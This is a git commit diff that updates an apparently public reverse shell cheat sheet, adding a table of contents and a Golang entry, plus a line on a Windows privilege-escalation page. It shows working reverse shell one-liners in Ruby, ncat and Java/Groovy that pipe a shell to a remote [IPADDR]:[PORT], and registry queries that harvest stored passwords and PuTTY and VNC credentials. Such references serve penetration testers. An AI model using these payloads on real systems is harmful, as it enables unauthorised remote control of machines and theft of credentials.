Reverse shell summary + golang

This commit is contained in:
Swissky 2019-04-02 22:43:44 +02:00
parent cbc57c7330
commit 3af87ddf98
2 changed files with 32 additions and 5 deletions

View File

@ -1,6 +1,30 @@
# Reverse Shell Methods
# Reverse Shell Cheat Sheet
## Reverse Shell Cheat Sheet
## Summary
* [Reverse Shell](#reverse-shell)
* [Bash TCP](#bash-tcp)
* [Bash UDP](#bash-udp)
* [Perl](#perl)
* [Python](#python)
* [PHP](#php)
* [Ruby](#ruby)
* [Goland](#golang)
* [Netcat Traditional](#netcat-traditional)
* [Netcat OpenBsd](#netcat-openbsd)
* [Ncat](#ncat)
* [OpenSSL](#openssl)
* [Powershell](#powershell)
* [Awk](#awk)
* [Java](#java)
* [War](#war)
* [Lua](#lua)
* [NodeJS](#nodejs)
* [Groovy](#groovy)
* [Spawn TTY Shell](#spawn-tty-shell)
* [References](#references)
## Reverse Shell
### Bash TCP
@ -77,6 +101,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
### Golang
```bash
@ -102,7 +127,7 @@ ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
```
## OpenSSL
### OpenSSL
```powershell
hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
@ -194,8 +219,9 @@ or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
### Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
NOTE: Java reverse shell also work for Groovy
```javascript
@ -205,7 +231,7 @@ String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
## Spawn TTY
## Spawn TTY Shell
Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick, a simple `sh` is recommended

View File

@ -209,6 +209,7 @@ REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials